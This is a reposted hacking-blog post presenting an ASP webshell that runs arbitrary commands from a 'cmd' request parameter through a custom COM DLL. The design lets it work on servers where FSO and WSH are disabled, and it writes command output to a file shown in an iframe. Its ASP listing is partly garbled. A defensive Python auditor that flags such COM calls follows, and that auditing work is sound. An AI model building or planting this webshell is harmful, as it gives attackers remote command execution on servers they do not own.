ASP Trojan without FSO and WSH

xiaoxiao, 2021-03-06

The interface is very simple, much like the ancient cmd.asp. Consider it a rough starting point meant to draw out better ideas.

After writing it I was quite pleased with myself ~~ it uses VB's Shell function!

In fact, its only advantage is that it still works on machines where FSO and WSH have been disabled.

The principle is to build a DLL that exposes an object, then have ASP call the Exec function of that object and pass it the command. The command's output is written to zz.txt in the directory where the web site is located, and the page reads that file through an iframe ~~ You need to refresh manually, though, because the shell call executes asynchronously.

PS: Kevinz.dll needs to be placed together with shell.asp to be usable, or shell.asp put in the system32 directory.

The code is as follows:

<%

Dim shell

Set shell = server.createObject ("kevinz.exec")

PATH = Server.mappath (".")

response.write " Now system Path is:

" & path & "


"

IF not Request ("cmd") = "" "" "

CMD = Request ("cmd")

CMD = Replace (cmd, "^", "^^")

CMD = Replace (cmd, ">", "^>")

CMD = Replace (cmd, "<", "^ <")

CMD = Replace (cmd, "&", "^ &")

Shell.exec cmd, Path

response.write "
Command:" "" & cmd & "" "
Command successfully executed
"

Else

CMD = "VER"

END IF

Set test = Nothing

%>

kevin1986's she11 aspd00r </title>
</head>
<form name="kevinz" action="shell.asp">
<input type="text" name="cmd" value=<%=cmd%> size=60>
<input type="submit" value="EXE (U E (0mm4nd">
<br>
<iframe height=60% width=80% src="zz.txt" name="result"></iframe><br>
<font size=2><a href=javascript:History.go(0) target="Result">View execution result</a></font></body>
</html>

When reposting, please cite the original address: https://www.9cbs.com/read-76539.html
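A defender's counterpart to the technique described above, as an added example that is not part of the original post: because disabling FSO and WSH does not stop a page from instantiating some other registered COM class, this Python script audits classic ASP source for CreateObject ProgIDs outside an allowlist and records whether request input is passed to a method of that object. The allowlist contents, the function name `audit_asp` and the sample snippet (condensed from the listing above) are assumptions constructed for illustration.

```python
import re

# Assumption: ProgIDs this site is expected to instantiate; adjust per application.
ALLOWED_PROGIDS = {"adodb.connection", "adodb.recordset", "scripting.dictionary"}

# [Set var =] [Server.]CreateObject("prog.id")
CREATE_RE = re.compile(
    r'(?:set\s+(\w+)\s*=\s*)?(?:server\s*\.\s*)?createobject\s*\(\s*"([^"]+)"\s*\)',
    re.IGNORECASE)
# var = Request(...) / Request.Form(...) / Request.QueryString(...)
REQ_ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*request\b', re.IGNORECASE | re.MULTILINE)

# Constructed sample, condensed from the page's listing plus one benign object.
SAMPLE = '''<%
Dim shell
Set shell = Server.CreateObject("kevinz.exec")
path = Server.MapPath(".")
cmd = Request("cmd")
shell.exec cmd, path
Set rs = Server.CreateObject("ADODB.Recordset")
%>'''

def audit_asp(source, allowed=ALLOWED_PROGIDS):
    """Return one finding per CreateObject call whose ProgID is not allowlisted."""
    findings = []
    # Variables assigned directly from the Request object.
    tainted = {m.group(1).lower() for m in REQ_ASSIGN_RE.finditer(source)}
    for m in CREATE_RE.finditer(source):
        var, progid = m.group(1), m.group(2)
        if progid.lower() in allowed:
            continue
        finding = {"progid": progid,
                   "line": source.count("\n", 0, m.start()) + 1,
                   "request_to_method": False}
        if var:
            # obj.Method arg1, arg2   or   obj.Method(arg1, arg2)
            call_re = re.compile(
                r'\b' + re.escape(var) + r'\s*\.\s*\w+[ \t(]+([^\r\n]*)', re.IGNORECASE)
            for call in call_re.finditer(source):
                args = {a.lower() for a in re.findall(r'\w+', call.group(1))}
                if args & tainted or "request" in args:
                    finding["request_to_method"] = True
        findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in audit_asp(SAMPLE):
        print(f)
```

A finding with `request_to_method` set is the higher-priority case for review, since it matches the request-parameter-to-COM-method flow the post relies on.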